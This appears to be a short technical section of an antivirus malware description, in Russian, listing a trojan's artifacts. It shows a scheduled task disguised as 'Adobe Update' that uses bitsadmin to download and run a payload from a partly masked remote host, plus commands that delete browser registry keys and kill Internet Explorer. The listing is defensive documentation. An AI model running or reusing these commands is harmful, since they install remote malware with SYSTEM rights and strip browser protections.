Техническая информация
- %WINDIR%\Tasks\Adobe Update.job
- '<SYSTEM32>\schtasks.exe' /Delete /TN "Adobe Update" /F
- '<SYSTEM32>\schtasks.exe' /CREATE /SC onstart /TN "Adobe Update" /TR "cmd /c ping -n 900 127.0.0.1 &bitsadmin /transfer My /Download http://vi##obox.pt/c001.jpg %TEMP%\c001.cpl &%TEMP%\c001.cpl" /ru SYSTEM
- '<SYSTEM32>\reg.exe' DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID /F
- '<SYSTEM32>\taskkill.exe' /im iexplore.exe
- '<SYSTEM32>\reg.exe' DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /F
- ClassName: '(null)' WindowName: '(null)'